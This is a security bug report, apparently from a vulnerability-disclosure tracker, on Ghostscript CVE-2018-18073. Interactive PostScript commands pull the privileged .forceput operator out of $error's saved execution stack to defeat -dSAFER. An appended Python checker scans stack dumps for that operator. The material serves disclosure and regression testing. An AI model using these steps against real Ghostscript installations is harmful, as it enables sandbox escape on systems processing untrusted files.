
Issue metadata

Status: Fixed
Closed: Oct 10

Issue 1690: ghostscript: $error object can expose system operators in saved execution stack.

Reported by, Oct 9 Project Member

Issue description

I've found a way of getting access to .forceput even after the fix in bug 1682; you can pull it out of the saved execution stack in $error:

$ gs -dSAFER -sDEVICE=ppmraw
GPL Ghostscript GIT PRERELEASE 9.26 (2018-09-13)
Copyright (C) 2018 Artifex Software, Inc.  All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
GS>{ null .setglobal } stopped clear
GS>$error /estack get ==
[--%interp_exit-- .runexec2 -file- {--dup-- null --ne-- {--exec-- true} {--pop-- false} --ifelse--} null 2 --%stopped_push-- -file- {prompt {(%statementedit) (r) --.systemvmfile--} --stopped-- {--pop-- --pop-- $error /errorname --get-- /undefinedfilename --eq-- {.clearerror --exit--} --if-- /handleerror --.systemvar-- --exec-- null} --if-- --cvx-- {.runexec} .execute --pop--} --%loop_continue-- {--pop--} {$error /newerror --get-- --and-- {/handleerror --.systemvar-- --exec-- --flush-- true} {false} --ifelse--} false 1 --%stopped_push-- .runexec2 -file- {--dup-- null --ne-- {--exec-- true} {--pop-- false} --ifelse--} null 2 --%stopped_push-- -file- false 1 --%stopped_push-- 1919 1 3 --%oparray_pop-- {-dict- /FontDirectory --.currentglobal-- {-dict-} {/LocalFontDirectory --.systemvar--} --ifelse-- --.forceput-- --pop--}]

Notice the .forceput in there...

GS>$error /estack get 29 get ==
{-dict- /FontDirectory --.currentglobal-- {-dict-} {/LocalFontDirectory --.systemvar--} --ifelse-- --.forceput-- --pop--}
GS>$error /estack get 29 get 6 get ==

See bug 1682 for a full exploit using .forceput; this code can just be plugged in and the full exploit will still work.

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.
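
A regression check for the exposure described in this report, added here as an example and not part of the original issue or of Ghostscript: it parses the text printed by `$error /estack get ==` and reports the `get` index path to each watched operator. The function names, the `WATCHED` set and the shortened sample dump are assumptions constructed for illustration.

```python
import re

# Operators treated as privileged. Only .forceput is named in the report;
# extending this set for a wider audit is an assumption of this example.
WATCHED = {".forceput"}

# Tokens of `==` output: (strings), array/procedure delimiters, atoms.
TOKEN = re.compile(r"\((?:[^()\\]|\\.)*\)|[\[\]{}]|[^\s\[\]{}()]+")

# Constructed sample: a shortened dump with the same shape as the report's.
SAMPLE = ("[--%interp_exit-- .runexec2 -file- {prompt {(%statementedit) (r) "
          "--.systemvmfile--} --stopped--} 1919 1 3 --%oparray_pop-- "
          "{-dict- /FontDirectory --.currentglobal-- {-dict-} "
          "{/LocalFontDirectory --.systemvar--} --ifelse-- --.forceput-- --pop--}]")


def parse(dump):
    """Parse one `==` dump into nested Python lists of atom strings."""
    stack = [[]]
    for tok in TOKEN.findall(dump):
        if tok in ("[", "{"):
            stack.append([])
        elif tok in ("]", "}"):
            if len(stack) < 2:
                raise ValueError("unbalanced closing delimiter")
            done = stack.pop()
            stack[-1].append(done)
        else:
            stack[-1].append(tok)
    if len(stack) != 1 or len(stack[0]) != 1:
        raise ValueError("expected exactly one balanced top-level object")
    return stack[0][0]


def find_exposed(node, path=()):
    """Yield (index_path, name) for each watched operator inside the dump."""
    for i, item in enumerate(node):
        if isinstance(item, list):
            yield from find_exposed(item, path + (i,))
        elif item.startswith("--") and item.strip("-") in WATCHED:
            yield path + (i,), item.strip("-")


if __name__ == "__main__":
    for path, name in find_exposed(parse(SAMPLE)):
        print(name, "reachable at index path", path)
```

Run on the full dump quoted in the report, it returns the path (29, 6), matching the reporter's `29 get 6 get`.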

Comment 1 by, Oct 9

Project Member
Labels: CVE-2018-18073
This is CVE-2018-18073.

Comment 2 by, Oct 10

Project Member
Labels: -Restrict-View-Commit
Status: Fixed (was: New)
Fixed now with this patch, I'll send a heads-up to oss-security.;a=commit;h=34cc326eb2c5695833361887fe0b32e8d987741c
